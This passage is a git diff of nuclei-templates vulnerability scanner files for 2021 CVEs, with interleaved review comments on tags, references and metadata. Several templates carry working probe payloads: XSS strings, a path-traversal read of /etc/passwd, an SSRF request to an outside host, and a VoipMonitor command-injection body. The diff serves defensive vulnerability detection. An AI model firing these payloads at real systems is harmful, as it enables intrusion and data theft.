4a0a0047304502200caeb28b18880aa0ad8c89fe3a0727a5835d39eb88fa6e914cab74cd695391f2022100814ffded3868c953f9b9cc6e4eb3744557c8506b5a649d348cca799b2459d9bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dd206ca7187b6ed469ca7ac639cf6d228f7811e762a78cdf8d6c89bd2defdf690220564ac31e30c8bf0db3d6b80d2f2903b35cb7fe2800fc655540dd2602b9e16acb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-27519.yaml b/nuclei-templates/CVE-2021/CVE-2021-27519.yaml deleted file mode 100644 index 93e44aea56..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-27519.yaml +++ /dev/null 
@@ -1,45 +0,0 @@ -id: CVE-2021-27519 - -info: - name: FUDForum 3.1.0 - Cross-Site Scripting - author: kh4sh3i - severity: medium - description: | - FUDForum 3.1.0 contains a cross-site scripting vulnerability which allows remote attackers to inject JavaScript via index.php in the "srch" parameter. - reference: - - https://www.exploit-db.com/exploits/49942 - - https://github.com/fudforum/FUDforum/issues/2 - - http://packetstormsecurity.com/files/162942/FUDForum-3.1.0-Cross-Site-Scripting.html - - https://nvd.nist.gov/vuln/detail/CVE-2021-27519 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-27519 - cwe-id: CWE-79 - metadata: - shodan-query: 'http.html:"Powered by: FUDforum"' - verified: "true" - tags: xss,fudforum,edb,packetstorm,cve,cve2021 - -requests: - - method: GET - path: - - '{{BaseURL}}/index.php?SQ=0&srch=x"+onmouseover%3Dalert%281%29+x%3D"&t=search&btn_submit.x=0&btn_submit.y=0' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'highlightSearchTerms("x" onmouseover=alert(1) x="");' - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/28 diff --git a/nuclei-templates/CVE-2021/CVE-2021-27520.yaml b/nuclei-templates/CVE-2021/CVE-2021-27520.yaml index 7543816a6e..4554d3323b 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-27520.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-27520.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | FUDForum 3.1.0 contains a cross-site scripting vulnerability. An attacker can inject JavaScript via index.php in the author parameter, thereby possibly stealing cookie-based authentication credentials and launching other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to the latest version of FUDForum or apply the provided patch to fix the XSS vulnerability. reference: @@ -13,13 +15,14 @@ info: - https://github.com/fudforum/FUDforum/issues/2 - http://packetstormsecurity.com/files/162942/FUDForum-3.1.0-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2021-27520 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-27520 cwe-id: CWE-79 - epss-score: 0.00189 - epss-percentile: 0.56336 + epss-score: 0.00217 + epss-percentile: 0.59015 cpe: cpe:2.3:a:fudforum:fudforum:3.1.0:*:*:*:*:*:*:* metadata: verified: true @@ -27,7 +30,7 @@ info: vendor: fudforum product: fudforum shodan-query: html:"FUDforum" - tags: packetstorm,cve,cve2021,xss,fuddorum,edb,intrusive + tags: cve2021,cve,packetstorm,xss,fuddorum,edb,intrusive,fudforum http: - method: GET @@ -54,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f713a871379cbd2030a6ce190e44926f79118a30a186605bc734905c98ab3c9a022100d8d0638278b1dea5392ea1978536ceb4c5065a7015a5bd6887442eb53e010257:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204a90f383fd73372c3a83f6f9db99d16bf93b8ee0401f22ad6088697eed2957d3022100a2c3bfa5bb7c6bc1edeeea494b9ad3a53468a5b98c9599afc9e4687efb802040:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
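Review bot: The tags line in the `@@ -27,7 +30,7 @@` hunk keeps the misspelled `fuddorum` tag while appending the correct `fudforum`, so the typo stays selectable and the two spellings will never match the same filter. Drop the misspelling rather than carrying both: `tags: cve2021,cve,packetstorm,xss,fudforum,edb,intrusive`. The epss and digest updates in the other hunks of this file need no change.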
diff --git a/nuclei-templates/CVE-2021/CVE-2021-27670.yaml b/nuclei-templates/CVE-2021/CVE-2021-27670.yaml index bf9798caf2..36f6eed5f7 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-27670.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-27670.yaml @@ -20,25 +20,21 @@ info: cvss-score: 9.8 cve-id: CVE-2021-27670 cwe-id: CWE-918 - epss-score: 0.61228 - epss-percentile: 0.97796 + epss-score: 0.58348 + epss-percentile: 0.97664 cpe: cpe:2.3:a:appspace:appspace:6.2.4:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: appspace product: appspace - shodan-query: - - title:"Appspace" - - http.title:"appspace" - fofa-query: title="appspace" - google-query: intitle:"appspace" + shodan-query: title:"Appspace" tags: cve,cve2021,appspace,ssrf http: - method: GET path: - - '{{BaseURL}}/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://{{interactsh-url}}' + - '{{BaseURL}}/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live' matchers-condition: and matchers: @@ -50,4 +46,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205415eedc43536bf50687094ab55d201c96e6d11aee855c35e9e2bd78e2a139420220127c277cdfae46eab2317d4efcda6c7096d437af1dad6d3744b5867edb1514c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210089fc67fdff5afadc5dae929f61d4b47fe38949d2e34156c446d6f3c7933a76d802204f0f7d330a006d1cc55b25bc4ec8d916a9b84081b3612e8a2745c96cae680ba7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-27909.yaml b/nuclei-templates/CVE-2021/CVE-2021-27909.yaml index 3472fde686..9d8da927e5 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-27909.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-27909.yaml 
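Review bot: The path line in the `@@ -20,25 +20,21 @@` hunk replaces `{{interactsh-url}}` with the fixed host `http://oast.live`, which removes the per-scan correlation token an out-of-band SSRF check depends on and directs every scanned target at a third-party host the operator does not control. Unless the matchers below this hunk (outside the visible lines) were changed to stop relying on an interaction callback, the template can no longer distinguish a real SSRF from any 200 response. Keep `url=http://{{interactsh-url}}`. The same hunk also drops the `fofa-query` and `google-query` metadata and one of the two shodan queries; if that is deliberate it deserves a line in the commit message.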
@@ -5,20 +5,32 @@ info: author: kiransau severity: medium description: Mautic before 3.3.4 contains a cross-site scripting vulnerability on the password reset page in the bundle parameter of the URL. An attacker can inject arbitrary script, steal cookie-based authentication credentials, and/or launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. + remediation: | + Upgrade Mautic to version 3.3.4 or later to mitigate this vulnerability. reference: - https://github.com/mautic/mautic/security/advisories/GHSA-32hw-3pvh-vcvc - https://nvd.nist.gov/vuln/detail/CVE-2021-27909 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-27909 cwe-id: CWE-79 + epss-score: 0.00094 + epss-percentile: 0.3927 + cpe: cpe:2.3:a:acquia:mautic:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: acquia + product: mautic shodan-query: title:"Mautic" - verified: "true" - tags: cve,cve2021,mautic,xss + tags: cve2021,cve,mautic,xss,acquia -requests: +http: - method: GET path: - "{{BaseURL}}/passwordreset?bundle=';alert(document.domain);var+ok='" @@ -40,5 +52,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/10/17 +# digest: 4b0a00483046022100e683409a42481a5acd5030e9e2be3bff0665fbc807a45864c349a222da9660ed022100dcca043790c8a6718aacdfa104e0129441726aa52264f8642a352b641c03507c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-27931.yaml b/nuclei-templates/CVE-2021/CVE-2021-27931.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-27931.yaml rename to nuclei-templates/CVE-2021/CVE-2021-27931.yaml 
diff --git a/nuclei-templates/CVE-2021/CVE-2021-28377.yaml b/nuclei-templates/CVE-2021/CVE-2021-28377.yaml deleted file mode 100644 index 832e5871fd..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-28377.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2021-28377 -info: - name: ChronoForums 2.0.11 - Directory Traversal - author: 0x_Akoko - severity: high - description: The ChronoForums avatar function is vulnerable through unauthenticated path traversal attacks. This enables unauthenticated attackers to read arbitrary files, like for instance Joomla's configuration file containing secret credentials. - reference: - - https://herolab.usd.de/en/security-advisories/usd-2021-0007/ - - https://nvd.nist.gov/vuln/detail/CVE-2021-28377 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L - cvss-score: 7.5 - cve-id: CVE-2021-28377 - cwe-id: CWE-200 - tags: cve,cve2021,chronoforums,lfi,joomla - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-28419.yaml b/nuclei-templates/CVE-2021/CVE-2021-28419.yaml index 92d54e7759..7ff682344f 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-28419.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-28419.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | SEO Panel 4.8.0 is susceptible to time-based blind SQL injection via the order_col parameter in archive.php. An attacker can potentially retrieve all databases and thus obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database. remediation: | Upgrade to a patched version of SEO Panel or apply the necessary security patches. reference: @@ -13,20 +15,21 @@ info: - https://www.seopanel.org/spdownload/4.8.0 - https://nvd.nist.gov/vuln/detail/CVE-2021-28419 - http://packetstormsecurity.com/files/162322/SEO-Panel-4.8.0-SQL-Injection.html + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2021-28419 cwe-id: CWE-89 epss-score: 0.17236 - epss-percentile: 0.95566 + epss-percentile: 0.95637 cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: seopanel product: seo_panel - tags: cve,cve2021,sqli,seopanel,auth,packetstorm + tags: cve2021,cve,sqli,seopanel,auth,packetstorm http: - raw: @@ -55,4 +58,4 @@ http: - 'status_code_3 == 200' - 'contains(body_3, "Overall Report Summary")' condition: and -# digest: 4b0a004830460221009821011fddd161883ee909d739db7a32b8d1a6a5a176b606325638817d67a25c02210091b1d3441b2f4c822ead4c789e0141d813ca77c24db4671ea4fb1b53152a7f11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ece85ed0a3e7f7b62a57b55f6bcc77db0d19a90ecb24f30602d76c261fe03159022100f1481ca4357aab094b84c582f7d0dea2013206ee99a0d03a7ced0a91ecf93b59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-29006.yaml b/nuclei-templates/CVE-2021/CVE-2021-29006.yaml index a5b8ee428b..dee3572992 100644 
--- a/nuclei-templates/CVE-2021/CVE-2021-29006.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-29006.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-29006 cwe-id: CWE-22 epss-score: 0.09465 - epss-percentile: 0.94132 + epss-percentile: 0.94172 cpe: cpe:2.3:a:rconfig:rconfig:3.9.6:*:*:*:*:*:*:* metadata: verified: true @@ -24,7 +24,7 @@ info: vendor: rconfig product: rconfig shodan-query: http.title:"rConfig" - tags: cve,cve2021,rconfig,authenticated,lfi + tags: cve2021,cve,rconfig,authenticated,lfi http: - raw: @@ -57,4 +57,4 @@ http: part: header_3 status: - 200 -# digest: 4a0a00473045022100bab9c5d2ed213fad65dd9cce4d62064dd727424c0d8b7cab32eb305966e48d9b022075d4699e3a786e8c099fe4778b9066483c3539050426a269c364e6275a53cc17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207fdb822293ed117ac244b6204a862e4cd97d7ed5b1a6da75806a95ba16942845022100cbb141a3f60efdaf36945a8ed3e93034fdb9dfa1e221d0ad775fbc7319d814a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-29484.yaml b/nuclei-templates/CVE-2021/CVE-2021-29484.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-29484.yaml rename to nuclei-templates/CVE-2021/CVE-2021-29484.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-29505.yaml b/nuclei-templates/CVE-2021/CVE-2021-29505.yaml index 0444500f06..3b35848109 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-29505.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-29505.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | XStream before 1.4.17 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: Patched in 1.4.17. reference: - https://paper.seebug.org/1543/ @@ -18,14 +20,14 @@ info: cvss-score: 8.8 cve-id: CVE-2021-29505 cwe-id: CWE-502 - epss-score: 0.03355 - epss-percentile: 0.90349 + epss-score: 0.04677 + epss-percentile: 0.91814 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xstream_project product: xstream - tags: oast,vulhub,cve,cve2021,xstream,deserialization,rce + tags: cve2021,cve,oast,vulhub,xstream,deserialization,rce,xstream_project http: - raw: @@ -112,4 +114,4 @@ http: - type: status status: - 500 -# digest: 4a0a00473045022100e71355e3eca1d09cab45449778e2b1ac8b5321a96c3e7b03e69f64a74add8e75022047733161c40306b2296fc6769a22db2e02e2f925ff37db0b5d16509bf6b533a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dbbd8f5e47047dc1ce75b7aa5cebea7678b2035517dd765160b1b31106393cd7022100b3ecc5d68e800b780f78acdae9aa0f9f80b4d2b8778cc7a32e7fce49e0ff5c60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-3002.yaml b/nuclei-templates/CVE-2021/CVE-2021-3002.yaml index 781aba2d77..fb0446244f 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-3002.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-3002.yaml 
@@ -1,21 +1,35 @@ id: CVE-2021-3002 info: - name: Seo Panel 4.8.0 - Post based Reflected XSS + name: Seo Panel 4.8.0 - Cross-Site Scripting author: edoardottt severity: medium - description: Seo Panel 4.8.0 allows reflected XSS via the seo/seopanel/login.php?sec=forgot email parameter. + description: Seo Panel 4.8.0 contains a reflected cross-site scripting vulnerability via the seo/seopanel/login.php?sec=forgot email parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Upgrade to a patched version of Seo Panel or apply the necessary security patches provided by the vendor. + reference: + - http://www.cinquino.eu/SeoPanelReflect.htm + - https://github.com/seopanel/Seo-Panel/issues/202 + - https://nvd.nist.gov/vuln/detail/CVE-2021-3002 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/ArrestX/--POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-3002 cwe-id: CWE-79 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-3002 - - http://www.cinquino.eu/SeoPanelReflect.htm - tags: cve,cve2021,seopanel,xss + epss-score: 0.00143 + epss-percentile: 0.49273 + cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: "seopanel" + product: seo_panel + tags: cve2021,cve,seopanel,xss -requests: +http: - raw: - | POST /seo/seopanel/login.php?sec=forgot HTTP/1.1 @@ -26,10 +40,6 @@ requests: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: header words: 
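Review bot: The new metadata in the `@@ -1,21 +1,35 @@` hunk writes `vendor: "seopanel"` with quotes while `product: seo_panel` on the next line and every other template touched by this commit (for example CVE-2021-28419) write the vendor bare; use `vendor: seopanel` so the field is consistent across the repository. The `@@ -26,10 +40,6 @@` hunk removes the status matcher here and the hunk on the following line re-adds it after the word matcher, which is a pure reorder and fine.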
@@ -40,4 +50,9 @@ requests: words: - "" - "seopanel" - condition: and \ No newline at end of file + condition: and + + - type: status + status: + - 200 +# digest: 4a0a0047304502207e4f1ee2781a368be0c458eaaae8adb53e43b78fb18efe6e0ddbd4360db50c72022100bf77a98625b43e44488d9ed1d3bc33636a35c06b8c93ced20fe941ed6cf52a97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-30049.yaml b/nuclei-templates/CVE-2021/CVE-2021-30049.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-30049.yaml rename to nuclei-templates/CVE-2021/CVE-2021-30049.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-30128.yaml b/nuclei-templates/CVE-2021/CVE-2021-30128.yaml index c439f7e542..0b586a7349 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-30128.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-30128.yaml 
@@ -4,23 +4,34 @@ info: name: Apache OFBiz <17.12.07 - Arbitrary Code Execution author: For3stCo1d severity: critical - description: Apache OFBiz has unsafe deserialization prior to 17.12.07 version + description: Apache OFBiz before 17.12.07 is susceptible to arbitrary code execution via unsafe deserialization. An attacker can modify deserialized data or code without using provided accessor functions. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: | + Upgrade Apache OFBiz to version 17.12.07 or later to mitigate this vulnerability. reference: - https://lists.apache.org/thread.html/rbe8439b26a71fc3b429aa793c65dcc4a6e349bc7bb5010746a74fa1d@%3Ccommits.ofbiz.apache.org%3E - - https://nvd.nist.gov/vuln/detail/CVE-2021-30128 - https://lists.apache.org/thread.html/rb3f5cd65f3ddce9b9eb4d6ea6e2919933f0f89b15953769d11003743%40%3Cdev.ofbiz.apache.org%3E - https://lists.apache.org/thread.html/rb3f5cd65f3ddce9b9eb4d6ea6e2919933f0f89b15953769d11003743@%3Cdev.ofbiz.apache.org%3E + - https://nvd.nist.gov/vuln/detail/CVE-2021-30128 + - http://www.openwall.com/lists/oss-security/2021/04/27/5 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-30128 cwe-id: CWE-502 + epss-score: 0.62199 + epss-percentile: 0.97748 + cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: apache + product: ofbiz fofa-query: app="Apache_OFBiz" - verified: "true" - tags: cve,cve2021,apache,ofbiz,deserialization,rce + tags: cve2021,cve,apache,ofbiz,deserialization,rce -requests: +http: - raw: - | POST /webtools/control/SOAPService HTTP/1.1 
@@ -56,3 +67,4 @@ requests: part: body words: - 'value="errorMessage"' +# digest: 490a004630440220198d21301bb0cc9c3eca7b3090244d4d6af10af1c8535d48b44443bc399a45a60220120ccdf8a168a43e6464f01e26d331f958ed562b71f2f1a0038dc57f6336595f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-30134.yaml b/nuclei-templates/CVE-2021/CVE-2021-30134.yaml index bc7cce8ad4..73e42c7040 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-30134.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-30134.yaml 
@@ -1,22 +1,35 @@ id: CVE-2021-30134 info: - name: php-mod/curl Library - Cross-Site Scripting + name: Php-mod/curl Library <2.3.2 - Cross-Site Scripting author: theamanrawat severity: medium description: | - php-mod/curl (a wrapper of the PHP cURL extension) before 2.3.2 allows XSS via the post_file_path_upload.php key parameter and the POST data to post_multidimensional.php. + Php-mod/curl library before 2.3.2 contains a cross-site scripting vulnerability via the post_file_path_upload.php key parameter and the POST data to post_multidimensional.php. An attacker can inject arbitrary script, which can allow theft of cookie-based authentication credentials and launch of other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. + remediation: | + Upgrade to Php-mod/curl Library version 2.3.2 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/0b547728-27d2-402e-ae17-90d539344ec7 - https://nvd.nist.gov/vuln/detail/CVE-2021-30134 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2021-30134 + cwe-id: CWE-79 + epss-score: 0.00097 + epss-percentile: 0.40139 + cpe: cpe:2.3:a:php_curl_class_project:php_curl_class:*:*:*:*:*:*:*:* metadata: - verified: "true" + verified: true + max-request: 1 + vendor: php_curl_class_project + product: php_curl_class google-query: inurl:"/php-curl-test/post_file_path_upload.php" - tags: cve,cve2021,xss,php-mod,wpscan + tags: cve2021,cve,xss,php-mod,wpscan,php_curl_class_project -requests: +http: - method: GET path: - "{{BaseURL}}/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php?key=" 
@@ -35,3 +48,4 @@ requests: - type: status status: - 200 +# digest: 490a00463044022054a7b10e32bdea6ad4464c85b29694b0a5fefd2b52c45ea6881458499ce110f6022074ab27b57a2dff0fa2011fb0edc23bda373e4d309c0498cf1470984592c44738:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-30175.yaml b/nuclei-templates/CVE-2021/CVE-2021-30175.yaml index 3a49bcea20..245a4f438a 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-30175.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-30175.yaml @@ -6,25 +6,28 @@ info: severity: critical description: | ZEROF Web Server 1.0 (April 2021) allows SQL Injection via the /HandleEvent endpoint for the login page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in ZEROF Web Server 1.0. reference: - https://github.com/awillix/research/blob/main/cve/CVE-2021-30175.md - https://nvd.nist.gov/vuln/detail/CVE-2021-30175 - https://pro.zerof.ru + - https://github.com/awillix/research classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-30175 cwe-id: CWE-89 - epss-score: 0.04078 - epss-percentile: 0.91175 + epss-score: 0.05126 + epss-percentile: 0.92775 cpe: cpe:2.3:a:zerof:web_server:1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zerof product: web_server - tags: cve,cve2021,zerof,sqli + tags: cve2021,cve,zerof,sqli http: - raw: 
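Review bot: The reference list in the `@@ -6,25 +6,28 @@` hunk for CVE-2021-30175 adds `https://github.com/awillix/research`, which is the repository root of the `CVE-2021-30175.md` link already listed two lines above it, so it adds no independent source. Drop the added line, or replace it with a link that carries information the existing references do not.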
@@ -50,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022041f7125bafe6fafc1677026792507a6e58c960e2a0724b15a012c482ef708317022100d2a95b9afbea8f99ba1a014562233d695f84cd0bfc30652853e0cce4a0befc53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022066b28106254e20b51249bccd4a6755378cf7bd895b20f4a7cd38193a27913081022024e2161db17ae6f5c03b0ef08c86ddc750b8b80e096c106097c2b90aa5d07b83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-30461.yaml b/nuclei-templates/CVE-2021/CVE-2021-30461.yaml index 3e99ae09d3..4f33512058 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-30461.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-30461.yaml @@ -1,5 +1,4 @@ id: CVE-2021-30461 - info: name: VoipMonitor Pre-Auth-RCE author: nithissh @@ -7,7 +6,6 @@ info: description: A malicious actor can trigger Un authenticated Remote Code Execution using CVE-2021-30461. tags: cve,cve2021,rce,voipmonitor reference: https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/ - requests: - raw: - | @@ -21,7 +19,6 @@ requests: Content-Length: 35 SPOOLDIR=test".system(id)."&recheck=Recheck - matchers-condition: and matchers: - type: word @@ -32,7 +29,6 @@ requests: - "VoIPmonitor installation" part: body condition: and - - type: status status: - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-3110.yaml b/nuclei-templates/CVE-2021/CVE-2021-3110.yaml index 62e21ef882..ca1e66df46 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-3110.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-3110.yaml 
@@ -6,19 +6,32 @@ info: severity: critical description: | PrestaShop 1.7.7.0 contains a SQL injection vulnerability via the store system. It allows time-based boolean SQL injection via the module=productcomments controller=CommentGrade id_products[] parameter. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of PrestaShop. reference: - https://medium.com/@gondaliyajaimin797/cve-2021-3110-75a24943ca5e - https://www.exploit-db.com/exploits/49410 - https://nvd.nist.gov/vuln/detail/CVE-2021-3110 + - https://medium.com/%40gondaliyajaimin797/cve-2021-3110-75a24943ca5e + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-3110 cwe-id: CWE-89 + epss-score: 0.83896 + epss-percentile: 0.98387 + cpe: cpe:2.3:a:prestashop:prestashop:1.7.7.0:*:*:*:*:*:*:* metadata: - verified: "true" - tags: cve,cve2021,sqli,prestshop,edb -requests: + verified: true + max-request: 1 + vendor: prestashop + product: prestashop + tags: cve,cve2021,sqli,prestshop,edb,prestashop + +http: - raw: - | @timeout: 20s @@ -33,5 +46,4 @@ requests: - 'contains(content_type, "application/json")' - 'contains(body, "average_grade")' condition: and - -# Enhanced by md on 2022/12/08 +# digest: 4a0a0047304502200c34a850d39fbeeddbc540d1d52ba9d67b8a5204578f8e85b7f4eb94e0afb1830221009b0894c1fc99cb6734f92c3f89d62c547c7a350f7e0f4c6b5edacd23e5a8ae19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
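Review bot: The tags line in the `@@ -6,19 +6,32 @@` hunk keeps the misspelled `prestshop` tag next to the newly appended `prestashop`, and unlike the other templates in this commit it leaves `cve,cve2021` in the old order; use `tags: cve2021,cve,sqli,prestashop,edb`. The same hunk adds `https://medium.com/%40gondaliyajaimin797/cve-2021-3110-75a24943ca5e`, which is the percent-encoded form of the Medium link already listed first in the references, so one of the two should go.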
diff --git a/nuclei-templates/CVE-2021/CVE-2021-31195.yaml b/nuclei-templates/CVE-2021/CVE-2021-31195.yaml index e5d445da7f..6c895b086f 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-31195.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-31195.yaml @@ -3,23 +3,34 @@ id: CVE-2021-31195 info: name: Microsoft Exchange Server - Cross-Site Scripting author: infosecsanyam - severity: high + severity: medium description: Microsoft Exchange Server, or OWA, is vulnerable to a cross-site scripting vulnerability in refurl parameter of frowny.asp. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the user's browser, potentially leading to session hijacking, data theft, or other malicious activities. + remediation: | + Apply the latest security updates provided by Microsoft to mitigate this vulnerability. reference: - https://blog.orange.tw/2021/08/proxyoracle-a-new-attack-surface-on-ms-exchange-part-2.html - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31195 - https://nvd.nist.gov/vuln/detail/CVE-2021-31195 - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31195 + - https://github.com/ARPSyndicate/kenzer-templates classification: - cvss-metrics: 